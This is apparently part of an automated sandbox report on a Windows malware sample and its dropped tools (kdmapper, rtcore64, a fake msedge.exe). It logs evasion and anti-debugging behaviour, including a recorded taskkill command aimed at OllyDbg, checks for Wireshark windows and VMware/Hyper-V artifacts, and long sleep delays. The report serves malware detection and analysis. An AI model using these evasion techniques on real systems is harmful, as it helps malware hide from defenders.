                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\kdmapper.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Speech\rtcore64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: Yara matchFile source: Process Memory Space: rtcore64.exe PID: 2220, type: MEMORYSTR
                                Source: UY9hUZn4CQ.exe, 00000000.00000002.3718839265.0000023C00D73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\CMD.EXE /C TASKKILL /F /IM OLLYDBG.EXE >NUL 2>&1L 2>&1
                                Source: UY9hUZn4CQ.exe, 00000000.00000002.3718839265.0000023C00D73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\CMD.EXE /C TASKKILL /F /IM OLLYDBG.EXE >NUL 2>&1
                                Source: UY9hUZn4CQ.exe, 00000000.00000002.3718839265.0000023C00D73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\CMD.EXE /C TASKKILL /F /IM OLLYDBG.EXE >NUL 2>&1UN3Z
                                Source: UY9hUZn4CQ.exe, 00000000.00000002.3718839265.0000023C00D73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\CMD.EXE /C TASKKILL /F /IM OLLYDBG.EXE >NUL 2>&12>&1
                                Source: Null.27.drBinary or memory string: ERROR: THE PROCESS "OLLYDBG.EXE" NOT FOUND.
                                Source: UY9hUZn4CQ.exe, 00000000.00000002.3718839265.0000023C00D73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\CMD.EXE /C TASKKILL /F /IM OLLYDBG.EXE >NUL 2>&12>&19N
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: 4AE0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Speech\rtcore64.exeMemory allocated: F60000 memory reserve | memory write watch
                                Source: C:\Windows\Speech\rtcore64.exeMemory allocated: 2970000 memory reserve | memory write watch
                                Source: C:\Windows\Speech\rtcore64.exeMemory allocated: 4970000 memory reserve | memory write watch
                                Source: C:\Windows\Speech\rtcore64.exeMemory allocated: 50D0000 memory reserve | memory write watch
                                Source: C:\Windows\Speech\rtcore64.exeMemory allocated: 60D0000 memory reserve | memory write watch
                                Source: C:\Windows\Speech\rtcore64.exeMemory allocated: 6200000 memory reserve | memory write watch
                                Source: C:\Windows\Speech\rtcore64.exeMemory allocated: 7200000 memory reserve | memory write watch
                                Source: C:\Windows\Speech\rtcore64.exeMemory allocated: 7690000 memory reserve | memory write watch
                                Source: C:\Windows\Speech\rtcore64.exeMemory allocated: 8690000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: F00000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1A9D0000 memory reserve | memory write watch
                                Source: C:\Windows\Speech\physmeme.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\Speech\rtcore64.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 840Jump to behavior
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\MQshNARH.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\ITDiARjW.logJump to dropped file
                                Source: C:\Windows\Speech\rtcore64.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dllJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\oLoCRyrD.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\QGjYUwSA.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\XEXXxLMp.logJump to dropped file
                                Source: C:\Windows\Speech\imxyvi.exeAPI coverage: 3.4 %
                                Source: C:\Windows\Speech\physmeme.exe TID: 7616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\Speech\rtcore64.exe TID: 2952Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 7592Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C482858 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,0_2_00007FF60C482858
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A953A518 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,28_2_00007FF6A953A518
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ECA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,52_2_00ECA69B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,52_2_00EDC220
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EEB348 FindFirstFileExA,52_2_00EEB348
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D072A2D FindFirstFileExW,65_2_6D072A2D
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EDE6A3 VirtualQuery,GetSystemInfo,52_2_00EDE6A3
                                Source: C:\Windows\Speech\physmeme.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\Speech\rtcore64.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Documents\desktop.ini
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\Local\Temp
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\Local
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user
                                Source: Amcache.hve.46.drBinary or memory string: VMware
                                Source: RegAsm.exe, 0000002F.00000002.1500499974.0000000001194000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                                Source: Amcache.hve.46.drBinary or memory string: VMware Virtual USB Mouse
                                Source: Amcache.hve.46.drBinary or memory string: vmci.syshbin
                                Source: Amcache.hve.46.drBinary or memory string: VMware, Inc.
                                Source: Amcache.hve.46.drBinary or memory string: VMware20,1hbin@
                                Source: Amcache.hve.46.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                                Source: Amcache.hve.46.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: Amcache.hve.46.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                                Source: RegAsm.exe, 0000002F.00000002.1499818933.0000000001145000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.1500499974.0000000001194000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: Amcache.hve.46.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: curl.exe, 00000015.00000003.1318843560.000001FE19AB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.00000000008FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                                Source: curl.exe, 0000001F.00000003.1395457647.000001EC889B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                                Source: Amcache.hve.46.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                                Source: Amcache.hve.46.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                                Source: Amcache.hve.46.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: curl.exe, 00000029.00000003.1458369540.000001F5B21A2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1494320625.000002E955E52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: Amcache.hve.46.drBinary or memory string: vmci.sys
                                Source: kdmapper.exe, 00000034.00000003.1482542387.0000000000B21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: Amcache.hve.46.drBinary or memory string: vmci.syshbin`
                                Source: Amcache.hve.46.drBinary or memory string: \driver\vmci,\driver\pci
                                Source: Amcache.hve.46.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: Amcache.hve.46.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
                                Source: Amcache.hve.46.drBinary or memory string: VMware20,1
                                Source: Amcache.hve.46.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                Source: Amcache.hve.46.drBinary or memory string: NECVMWar VMware SATA CD00
                                Source: Amcache.hve.46.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                Source: Amcache.hve.46.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                Source: Amcache.hve.46.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                Source: Amcache.hve.46.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                Source: Amcache.hve.46.drBinary or memory string: VMware PCI VMCI Bus Device
                                Source: Amcache.hve.46.drBinary or memory string: VMware VMCI Bus Device
                                Source: Amcache.hve.46.drBinary or memory string: VMware Virtual RAM
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                                Source: Amcache.hve.46.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                Source: Amcache.hve.46.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                Source: C:\Windows\Speech\kdmapper.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Edge\msedge.exeProcess information queried: ProcessInformation

                                Anti Debugging

                                barindex
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeOpen window title or class name: the wireshark network analyzer
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeOpen window title or class name: ollydbg
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_00446730 LdrInitializeThunk,47_2_00446730
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C483728 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF60C483728
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EE7DEE mov eax, dword ptr fs:[00000030h]52_2_00EE7DEE
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EEC030 GetProcessHeap,52_2_00EEC030
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
